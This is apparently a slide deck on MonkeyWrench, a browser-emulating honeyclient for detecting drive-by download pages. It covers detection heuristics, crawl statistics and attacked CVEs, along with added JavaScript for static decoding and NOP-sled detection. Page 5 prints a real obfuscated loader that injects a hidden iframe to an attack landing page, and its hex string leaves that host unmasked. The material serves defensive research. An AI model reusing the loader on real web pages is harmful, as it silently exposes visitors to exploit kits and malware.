Page 1
Detecting malicious web pages with MonkeyWrench
Armin Büscher
Developer / Malware Analyst @ G Data SecurityLabs
Page 2
Agenda
• Malicious web pages
• MonkeyWrench
• Test runs
• monkeywrench.de
• Demo
• Future work
Page 3
Malicious web pages
• #1 infection vector of client computers
• Single visit of a malicious page can lead to drive-by download of malware
Page 4
Malicious web pages: Web exploit kits
Page 5
Malicious web pages: Obfuscation

<script>
var s='3C696672616D65207372633D22687474703A2F2F7777772E766964736E69636865732E636F6D2F746F702F7A2F7374617469632E7068703F7369673D37373735373332383646364237353233363337373643334236413746374437323444304334373439343522206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E';
var o='';
for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);
o=o+c+s.substr(i,2);}
var v=navigator.appVersion;
if (v.indexOf('MSIE 6.0') != -1)
{document.write(unescape(o));}
if (v.indexOf('MSIE 5.') != -1)
{document.write(unescape(o));}
</script>

Decoded iframe that the script writes into the page (only for MSIE 5.x / 6.0 visitors):

<iframe src=http://www.vid******s.com/top/z/static.php?sig=777573286F6B752363776C3B6A7F7D724D0C474945 height="2" style="display:none" width="2"></iframe>
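As an added example (not MonkeyWrench's own code), here is how a low-interaction analyzer can undo the hex-string trick above statically, without running the script, and flag the hidden iframe it produces; the host name and sig value in the constructed sample are placeholders.

```javascript
// Added example, not MonkeyWrench project code: statically decode the hex-string
// loader shown above without executing it. Script, host and sig are constructed.

// Decode hex pairs exactly as the loader's "%" + substr(i,2) loop followed by
// unescape() would: every pair becomes one character.
function decodeHexPairs(hex) {
  let out = '';
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Extract <iframe> tags from decoded markup and judge whether each is hidden
// (display:none or at most 2x2 pixels, as in the slide's sample). Unknown size is not tiny.
function findHiddenIframes(markup) {
  const results = [];
  const tag = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tag.exec(markup)) !== null) {
    const attr = (name) => {
      const a = new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i').exec(m[1]);
      return a ? a[1] : null;
    };
    const width = parseInt(attr('width'), 10);
    const height = parseInt(attr('height'), 10);
    const style = (attr('style') || '').toLowerCase();
    const hidden = style.includes('display:none') || (width <= 2 && height <= 2);
    results.push({ src: attr('src'), width, height, hidden });
  }
  return results;
}

// Find long hex literals in script text, decode each and report hidden iframes.
function scanScript(scriptText) {
  const findings = [];
  for (const m of scriptText.matchAll(/'([0-9A-Fa-f]{16,})'/g)) {
    if (m[1].length % 2 === 0) findings.push(...findHiddenIframes(decodeHexPairs(m[1])));
  }
  return findings;
}

// Constructed sample in the slide's shape (placeholder host and sig value).
function hexEncode(s) {
  return Array.from(s, (c) => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}
const SAMPLE_SCRIPT = "var s='" + hexEncode('<iframe src="http://landing.example.invalid/static.php?sig=PLACEHOLDER"'
  + ' height="2" style="display:none" width="2"></iframe>') + "';var o='';"
  + "for(i=0;i<s.length;i=i+2){o=o+'%'+s.substr(i,2);}document.write(unescape(o));";
```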
Build a fast Honeyclient system to automatically detect and analyze the bulk of web attacks
Page 6
• Low-interaction Web-Honeyclient
• Diploma thesis (Computer Science)
• Research project @ G Data SecurityLabs
Page 7
Low-interaction Web-Honeyclient
• Honeyclient ↔ Client-Honeypot
• Connect to web servers & check pages for malicious content
• High-interaction:
• Regular system (often virtualized) with client software driven by Honeyclient
• Detection similar to malware sandbox implementations
• Low-interaction:
• Emulation of client software (→ browser)
Page 8
MonkeyWrench: Project Goals
• Inspect websites faster than high-interaction systems
• Emulate browsers to deal with:
• sophisticated obfuscation techniques
• browser-specific behavior
• Deep analysis of web-based attacks to identify:
• stages of an attack
• preparative techniques
• attacked vulnerabilities
Page 9
Page 10
MonkeyWrench: Client
• Written in Java
• Multithreading of emulated browser instances
• Utilizes HTMLUnit (htmlunit.sourceforge.net)
• “GUI-less browser for Java programs”
• Unit tests of web pages
• Possible emulated browsers:
• Microsoft Internet Explorer 6/7/8
• Mozilla Firefox 2/3
Page 11
MonkeyWrench: Client architecture
Page 12
MonkeyWrench: Detection
• Vulnerability modules
• ActiveX (e.g. emulation of a buffer overflow)
• Browser / DOM / static HTML analysis
• Shellcode
• GetPC heuristics
• WinAPI search loops
• Heapspray / NOP-Sleds
• Entropy
• Heap usage
• AV signatures
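As an added example (not the project's code), two of the shellcode heuristics listed above, NOP-sled detection and entropy, applied to a %u-encoded string of the kind used for heap sprays; the thresholds and the sample string are assumptions.

```javascript
// Added example, not MonkeyWrench code: NOP-sled and entropy heuristics applied
// to a "%uXXXX"-encoded heap-spray string. Thresholds and sample are assumptions.

// %u escapes become bytes, little-endian per 16-bit word, as unescape() lays them out.
function decodeUnicodeEscapes(str) {
  const bytes = [];
  for (const m of str.matchAll(/%u([0-9A-Fa-f]{4})/g)) {
    const w = parseInt(m[1], 16);
    bytes.push(w & 0xff, w >> 8);
  }
  return bytes;
}

// Longest run of one repeated byte: a long run (classically 0x90) is a NOP sled.
function longestRepeatRun(bytes) {
  let best = { value: null, length: 0 }, run = 0;
  for (let i = 0; i < bytes.length; i++) {
    run = i > 0 && bytes[i] === bytes[i - 1] ? run + 1 : 1;
    if (run > best.length) best = { value: bytes[i], length: run };
  }
  return best;
}

// Shannon entropy in bits per byte: 0 for a pure sled, near 8 for packed/encrypted data.
function shannonEntropy(bytes) {
  if (bytes.length === 0) return 0;
  const counts = new Map();
  for (const b of bytes) counts.set(b, (counts.get(b) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) h -= (c / bytes.length) * Math.log2(c / bytes.length);
  return h;
}

// Verdict: sled of >= minSled bytes plus a tail of >= minTailEntropy bits per byte.
function looksLikeSledAndPayload(str, minSled = 64, minTailEntropy = 4) {
  const bytes = decodeUnicodeEscapes(str);
  const sled = longestRepeatRun(bytes);
  if (sled.length < minSled) return false;
  return shannonEntropy(bytes.filter((b) => b !== sled.value)) >= minTailEntropy;
}

// Constructed sample: 64 words of %u9090 (a 128-byte sled), then 32 words of varied bytes.
function buildSample() {
  let s = '%u9090'.repeat(64);
  for (let i = 0; i < 64; i += 2) {
    const lo = (i * 37) & 0xff, hi = ((i + 1) * 37) & 0xff;
    s += '%u' + ((hi << 8) | lo).toString(16).padStart(4, '0');
  }
  return s;
}
```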
Page 13
Test runs: Setup
• Quad core system running Debian Linux
• DSL 3 Mbit/s & (since 04/2010) VDSL 50 Mbit/s
• Feeding the beast:
• Google Hot Trends (→ BH SEO)
• Customer reports
• Links parsed from spam mails
• malwaredomainlist.com, malc0de.com, …
Page 14
Test runs: Numbers
• >1.3 million web pages checked (since 12/2009)
• max. # checked pages/hour ~ 2,200 (1.63 sec per check)
• 84,526 attacks detected
• 12 GB of malicious or suspicious samples downloaded (HTML, JS, PDF, EXE, …)
• 23,618 malicious executables (~24% undetected by AV signatures)
• 6,292 shellcode payloads extracted
Page 15
Chart: CVE-2010-0249 "Aurora" (y-axis 0 to 100)
Page 16
Chart: Attacked vulnerabilities, Nov-09 to Apr-10 (share in %, y-axis 0 % to 70 %)
Series: CVE-2007-3147, CVE-2008-0015, CVE-2008-1309, CVE-2008-2463, CVE-2009-1136, CVE-2010-0249, CVE-2010-0806, Malicious PDFs
Page 17
monkeywrench.de
• Free web service
• Analyze malicious web pages with MonkeyWrench
• Community partners are welcome!
Demo
Page 18
Future Work
• Integrate PDF analysis into monkeywrench.de
• Karsten Tellmann's PDX-Ray
• Integrate shellcode sandbox
• Flash module